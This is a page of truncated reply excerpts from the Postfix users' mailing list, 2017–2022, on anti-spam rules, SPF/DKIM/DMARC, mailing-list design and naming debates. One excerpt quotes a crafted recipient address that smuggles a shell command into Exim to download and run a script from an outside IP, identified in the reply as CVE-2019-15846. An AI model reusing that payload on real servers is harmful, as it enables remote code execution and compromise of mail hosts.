Re: How to implement something close to, but not quite an "announcement-only" mailing list?

On 4/14/2017 9:35 PM, Ramon F Herrera wrote: I guess this would be more descriptive and succinct: A "members-only PLUS disguising of all e-mail addresses contained in the headers" mailing list. I didn't follow all your logic in the previous email but overall you'll likely need something

Re: How to implement something close to, but not quite an "announcement-only" mailing list?

On 4/14/2017 10:19 PM, Ramon F Herrera wrote: On 4/14/2017 8:41 PM, Kevin A. McGrail wrote: On 4/14/2017 9:35 PM, Ramon F Herrera wrote: I guess this would be more descriptive and succinct: A "members-only PLUS disguising of all e-mail addresses contained in the headers" maili

Re: Do you know an FOSS email system for kids?

On 4/19/2017 7:43 AM, Dedeco Balaco Baco wrote: in the last months, I have been searching for an email system with some features to make it better for kids, even for younger ages, and also their parents. We need a few features to guarantee some security to free messaging among known friends, but

Re: Do you know an FOSS email system for kids?

On 4/15/2017 10:31 AM, Dedeco Balaco Baco wrote: in the last months, I have been searching for an email system with some features to make it better for kids, even for younger ages, and also their parents. We need a few features to guarantee some security to free messaging among known friends,

Re: What's a better error code than 554 to get a sending server to stop retrying?

On 7/25/2017 7:42 PM, /dev/rob0 wrote: Oh, I disagree. The best thing to do is to reject anything you're unwilling/unable to deliver. You're not causing any bounces; if a connecting client does generate a bounce for your rejection that is THEIR problem; or in the case of a human sender, that

Re: What's a better error code than 554 to get a sending server to stop retrying?

On 7/25/2017 5:51 PM, robg...@nospammail.net wrote: Depending on where I read about it that "554 5.7.1" error code means "failed transaction". Unfortunately, you might need logic to accept and silently discard. We do this, for example, with viruses to avoid blowback. Regards, KAM

Re: OT? SRV records etc

On 4/25/2017 4:57 PM, John wrote: How likely is it for a DNS to have SRV records for such things as smtp. imap ... I know that a dumb ? but I am try to guesstimate how big an dewy eyed optomist I am being in hoping that they are common practise. In my experience, very rare, not even sure what

Re: accept+discard vs. reject

On 7/25/2017 8:48 PM, /dev/rob0 wrote: I am curious, what kind of logic do you have to determine that a spamming client might be a backscatterer? Are you talking about a custom policy service, or a milter? For the record, I can agree to disagree as I respect and understand your position. I

Re: OT? - Blocking attachments

On 5/14/2017 7:22 AM, john wrote: This may not be a Postfix problem, but bearing in mind the recent events this forum may have some good ideas. After the recent rasomeware attacks we are considering the idea of blocking all attachments. I am not sure of the best way of doing this, but

Re: Do you know an FOSS email system for kids?

On 4/30/2017 12:48 PM, Dedeco Balaco Baco wrote: Kam, I am still a bit puzzled with what I should do. I have seen the README file inside your attachment, and it mentions Sendmail several times. But it does not mention Postfix. Is it possible to install Mimedefang and BeggarMail with Postfix? I

Re: Trace spam activity on mail server

its Trend Micro. Yes, I'm a big fan of MXToolBox. Great tool! I agree, you might be looking for a ghost in the machine that doesn't exist and it's a FP from TrendMicro. Regards, KAM -- *Kevin A. McGrail* CEO Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032

Re: Trace spam activity on mail server

On 5/2/2017 10:56 AM, li...@lazygranch.com wrote: Would a spammy email server only trigger one RBL? Sure. Spam is often in the eye of the beholder, people use different feeds, different policies, purposes, etc. I wouldn't discount it that it's an issue just because it's only on one RBL.

Re: Trace spam activity on mail server

On 5/2/2017 9:51 AM, Michael Segel wrote: You can run a check on your MX Server… there are a couple of web sites that do this… and I think one or two will identify the RBLs that include you. One trick I use a lot when I have an infected machine on a network or a customer with a problem is that

Re: Do you know an FOSS email system for kids?

On 4/30/2017 2:12 PM, Dedeco Balaco Baco wrote: But what did you use to make this interface? Before reading some documentation about Beggarmail and Mimedefang, I thought about using PHP. Now I am not sure that would be a practical solution. PHP would be a straightforward way to go. Any

Re: How to fake Per-Recipient Data Responses (PRDR)?

On 10/1/2017 8:15 PM, MRob wrote: Hello, short of Per-Recipient Data Responses (PRDR) becoming standard, may I ask how administrators are faking it? I understand you can temp-fail all but the first rcpt-to, but how to do this in Postfix? Does it require a custom milter? Surely there must be a

Re: How to fake Per-Recipient Data Responses (PRDR)?

On 10/2/2017 11:14 AM, Noel Jones wrote: http://www.postfix.org/postconf.5.html#smtpd_recipient_limit I don't think we are talking about the same thing.  If I set this to 1, I would expect a 5xx for an email with more than one recipient. Do you know for sure? Regards, KAM

Re: How to fake Per-Recipient Data Responses (PRDR)?

On 10/2/2017 11:47 AM, Noel Jones wrote: Yes, for sure. Extra recipients will get a 4xx response. Note this may*severely* delay deliveries, depending on the sender's retry policy. If a message arrives with 100 recipients, the sender will need to retry 99 times, which will likely take a very

Re: Simple mailing list: Possible for multiple domains?

On 8/21/2017 8:30 AM, Benny Pedersen wrote: wie...@porcupine.org skrev den 2017-08-21 14:05: Use mailman. It sets the envelope sender, meaning that there is no need for SRS, and presumably supports From: header munging, to work around DMARC damage. what damage ?, atleast its not needed on

Re: Simple mailing list: Possible for multiple domains?

Benny, I wrote those notes years ago when Yahoo! surprise a lot of people with the enforcement of DMARC with little consideration for mailing lists. http://dmarc.org/faq.html#s_3 is the key point. IMO, some providers acted rashly and broke a lot of things but the end it likely is better for

Re: accept email if pass SPF or DKIM

On 1/10/2018 9:53 PM, li...@lazygranch.com wrote: RTFMing, I see that both opendkim and python-policyd-spf have whitelisting capabilities (especially python-policyd-spf). But for the most part, my legitimate incoming email passes DKIM or SPF, but often not both. What I would like to do is accept

Re: Two different IP for one mx

On 1/29/2018 5:03 PM, jin wrote: It is 192.168.34.30/24 So that's a Class C (256 IPs) block from the reserved private class B address block*.  So you are definitely NATted if you have access to the internet. If you have a 1:1 NAT and can do port forwards, etc. up

Re: Server will send spam

On 1/29/2018 4:59 PM, Maurizio Caloro wrote: Since today me Email Server will be send a lot of rubish, and i dont know why please can any one give me here any little Help! The evidence you sent shows from a brief review that it's coming from your mail server.  I think you likely have a

Re: Two different IP for one mx

On 1/29/2018 4:09 PM, jin wrote: We are tring to move our mx server to another isp. They gave us an IP address but there is some strange points. When i try to connect any mail related port on that ip, it send my connection to our new postfix server. There is a destination nat on it. It is

Re: FWIW, port 465 gets standards-track blessing from RFC8314

On 2/12/2018 9:05 PM, @lbutlr wrote: On 2018-02-12 (18:28 MST), Harald Koch wrote: I can't think of a single reason to have two submission ports. Compatability with the clients that only implement one? Are there any? It's been a long time since I saw someone using an old

Re: Spammer rejected, but resends every 10 minutes. Any way to prevent this

On 3/13/2018 10:51 PM, li...@lazygranch.com wrote: > I'm getting hit every 10 minutes from this spammer. As you can see I am > rejecting the message. I wonder if the offending email server doesn't > know the message is being rejected? > > Mar 13 23:28:58 centos-1gb-sfo1-01 postfix/smtpd[22153]:

Re: Read Only account

On 4/20/2018 3:40 PM, @lbutlr wrote: > How would I configure a user so that they could only read mail and not send > any mail (even to local users). > Different auth for POP or IMAP vs SMTP?

Re: Fwd: analysing of dmarc report

You might look into dmarcian.com to help. Regards, KAM On November 21, 2018 2:33:12 AM EST, Poliman - Serwis wrote: >I have a problem with understanding dmarc reports and some features. >I attach two reports. First one come from google.com, second one from >tumieszkamy.pl. On my server is dns

Re: pishing from ME

d management. See https://www.bettercloud.com/monitor/a-top-g-suite-expert-shares-his-31-best-modern-security-tips/ and search passphrases. Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this exact run of spams. Regards, KAM -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consu

Re: pishing from ME

On 3/22/2019 9:31 PM, Viktor Dukhovni wrote: >> Have you checked on haveibeenpwned for the email addresses and domains >> in question? > There's no need. The team mailboxes in question are not associated > with any login accounts, they're just public contact addresses > scraped from websites.

Re: pishing from ME

//www.google.com/url?q=https%3A%2F%2Fwww.webex.com%2Fpdf%2Ftollfree_restrictions.pdf=D=1553730640914000=AFQjCNFEa-zxAltZcMVMj9XNBRIxOQqE2A>Access code: 927 552 095 Regards, KAM -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032 ht

Re: pishing from ME

On 3/22/2019 9:06 PM, Viktor Dukhovni wrote: > Sure they may also be scraping email addresses from breaches, but > that's one source. These scams are not a specific indication that > one's passwords are at risk. That's true or false with or without > receipt of these scams. Have you checked on

OFF-TOPIC: KAM.cf to Core SA was Re: pishing from ME

On 3/22/2019 10:45 PM, Benny Pedersen wrote: > Kevin A. McGrail skrev den 2019-03-23 00:34: > >> Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this >> exact run of spams. > > will you add good rules to core spamassassin ? > > so above is testing

Re: ODMR/ATRN ?

anything written in Perl running > on any outward facing port. It's just way too easy for an attacker to > run the CPU usage up to 100% and keep it there if one does so. > > Looking forward to info on Postfix support for ODMR or alternatives thereto. > > > Regards, > rfg -

Re: ODMR/ATRN ?

On 6/9/2019 6:18 PM, Ronald F. Guilmette wrote: > Thank you, but I need to be frank. I thought you were Ronald?  :-) > I believe that I understand fully how to handle my outbound email traffic, > i.e. treating my (soon to be) cloud VM running Postfix as a "smarthost" > for outbound. That part

Re: spam from own email address

On 4/23/2019 10:02 AM, Ian Jones wrote: > I am getting emails like the one below, in which the header from is my > own address. Ian, are you using Apache SpamAssassin or something in the mix?  I've published a lot of rules for these sexploitation scams in KAM.cf and with an SPF record, you

Re: spam from own email address

On 4/23/2019 12:20 PM, Benny Pedersen wrote: > // maintainer hat on > > why are this rules not added to spamasassin core :( > Because masscheck and rule qa takes too long for the purposes we need the rules for. > \\ maintainer hat off > > or atleast a real spamassassin channel repo

OFF-TOPIC - Re: Adding DKIM and DMARC

On 8/25/2019 11:49 AM, @lbutlr wrote: > When adding DMARC and DKIM do I only need to add it to the domain that is > hosting the mail server (MX)? > > For example, if mail.example.com is defined as the MX for example.com and > example.net, do I need to add the DMARC/DKIM records to example.net’s

Re: Refuse mail from hosts with closed port 25

On 9/16/2019 11:00 AM, Benny Pedersen wrote: > Kevin A. McGrail skrev den 2019-09-16 16:19: >> Fair enough.  Maybe he should turn that feature on then :-) > > if you do you cant recieve email from me > > validMX is strict to say domains without MX is invalid domain ? &

Re: Refuse mail from hosts with closed port 25

e a bit more strict than > Postfix's built-in address sanity checks. -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032 http://www.pccc.com/ 703-359-9700 / 800-823-8402 (Toll-Free) 703-798-0171 (wireless) kmcgr...@pccc.com <mailto

Re: Refuse mail from hosts with closed port 25

On 9/16/2019 9:03 AM, Jim Reid wrote: > On 16 Sep 2019, at 13:47, Paul van der Vlis wrote: > > How can I refuse mail from hosts who don't have an open port 25? Paul, I wrote a module which I need to update on Perl's CPAN called Net::validMX that we use to reject IPv4 domains that aren't properly

Re: block 'new style' TLDs ?

.gz 65b783d037ebe8a99466e15c0409c51ed3fa12d046139232ba90d6ccb63614008e2c54138a01f8afe67f38c163e5bf2955d2c8fd2bf2397b83d09a4b0a6534e7 Mail-SpamAssassin-3.4.3-rc5.zip ed1565c8f4448319546808fc2a2326f380153699631089c183ee93aa962fded59414643b2345ecdfabf9098d40609dd121b1056feabd162d830ea527ec2c3b04

Re: [External] Block email based on reply field

If you have integrated with Apache SpamAssassin, then v3.4.3 introduces the ability to do RBL lookups on the domain in Reply-to as well as the ability to do hashed lookups. Regards, KAM On 12/11/2019 9:38 PM, li...@lazygranch.com wrote: > I have a spammer who uses all sorts of "from" addresses

Re: [External] Re: SPF IP addresses limit question

On 2/23/2020 11:30 PM, Mohamed Lrhazi wrote: > > My question still was: Suppose I comply with all the > recommendations and best practices in composing my SPF records... Do I > still need to worry about the number of IP addresses (v4/v6/ciders) > that I put in each record? Yes. In the anti-spam

Re: [External] Re: SPF IP addresses limit question

On 2/23/2020 7:08 PM, Scott Kitterman wrote: > The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4. > was written. I would there is also a somewhat arbitrary limit that was picked that doesn't t match the real world.  See

Re: [External] command injection by crafted recipient address

On 3/12/2020 4:40 PM, kris_h wrote: > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost It's an exim exploit.  See CVE-2019-15846. Regards, KAM

OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

> Scott, I have another question. Gents, I love geeking about email and spam techniques but these are not postfix related nor do they relate to beer*.  IMO these should be discussed elsewhere. Regards, KAM * There are some mailing lists with exclusions that discussions on beer are always

Re: [External] spam uses my email address as sender in "header from"

On 9/14/2020 6:35 AM, Fourhundred Thecat wrote: > Can I reject messages that have different envelope from and header from? > > Or what would be the best approach ? Are you publishing an SPF record?  Are you using DKIM?  Are you publishing a DMARC policy (even one with policies of none)?  Are

Re: [External] Re: postfix and MX

On 9/17/2020 9:20 PM, Antonio Leding wrote: > > I stopped believing long ago that Microsoft adhered to any standard in > earnest.  To me, they always seemed to be more about > implanting new standards that the world would then follow… In fairness, Microsoft's embrace/extend/extinguish plans are

Re: [External] Re: The historical roots of our computer terms

Wietse > >> Leah Culver (@leahculver) tweeted at 11:32 PM on Fri, Jun 05, 2020: >> I refuse to use ?whitelist?/?blacklist? or ?master?/?slave? terminology for >> computers. Join me. Words matter. >> (https://twitter.com/leahculver/status/1269109776983547904?s=03) -- *Ke

Re: [External] Re: The historical roots of our computer terms

On 6/6/2020 11:00 AM, Ian Evans wrote: > > > On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail, <mailto:kmcgr...@pccc.com>> wrote: > > Thanks for the reminder on this.  The Apache SpamAssassin project > voted to do this change on May 3rd and I'm taki

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 9:06 AM, John Dale wrote: > Why does this agitate people?  Because if the time spend on this > change had been used to fix an actual deficiency, people of color who > use the software would have been served with value, not just platitudes. Sounds like a lot of pontificating.  Can you

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 8:37 AM, Phil Stracchino wrote: > The color is widely and somewhat sardonically known as 'bleen' or 'grue'. See, that's just wrong. We all know what a Grue is... Regards, KAM https://zork.fandom.com/wiki/Grue

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 9:54 AM, vi...@vheuser.com wrote: > > On 2020/06/08 09:31 AM, Kevin A. McGrail wrote: >> On 6/8/2020 9:06 AM, John Dale wrote: >>> Why does this agitate people?  Because if the time spend on this >>> change had been used to fix an actual deficienc

Re: [External] SPAM attack from bounce techniques

On 12/29/2020 7:37 AM, Rafael Azevedo wrote: Hi there, I've noticed that one of our servers is receiving a huge amount of unauthorized requests. User connects to our server and tries to send an email to any destination. Our servers denies the message because user is not authenticated.

Re: [External] Postfix and Mimedefang for single user?

Hi LuKreme, I believe once you hook in MIMEDefang with postfix, it's a general purpose filter that uses the milter interface to process emails at various stages of the mail dialogue and processing.  It hurts my brain to think about whether Postfix could do a filter on the recipients and then

Re: [External] Re: Deprecated: white is better than black

the reminder, configure the respectful_logging parameter to "yes" or "no", or configure "compatibility_level = 3.6". -- *Kevin A. McGrail* /CEO Emeritus/ *Peregrine Computer Consultants Corporation* +1.703.798.0171 kmcgr...@

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

On 10/11/2021 5:32 PM, Carl Brewer wrote:  0.0 URIBL_BLOCKED  ADMINISTRATOR NOTICE: The query to URIBL was     blocked.  See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

On 10/11/2021 6:28 PM, Carl Brewer wrote: http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a caching

Re: [External] Re: Why the name Postfix?

Great Idea!  Done On 3/27/2022 6:08 PM, lists wrote: Perhaps someone who knows how to update wiki can add this information. https://en.wikipedia.org/wiki/Postfix_(software)

Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

On 5/31/2022 10:18 AM, Bret Busby wrote: I keep seeing "AW" prepended to message subjects and I have no idea of what it means. What does it mean? I believe it's the German equivalent for re: (https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as in Regarding. Regards, KAM

Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

On 10/26/2022 10:56 AM, Viktor Dukhovni wrote: RAPTOR REMARK: Alert! Please be careful! This email is from an EXTERNAL sender. Be aware of impersonation and credential theft. On Wed, Oct 26, 2022 at 03:56:29PM +0200, Gerald Galster wrote: This issue is resolved by update KB5018496 for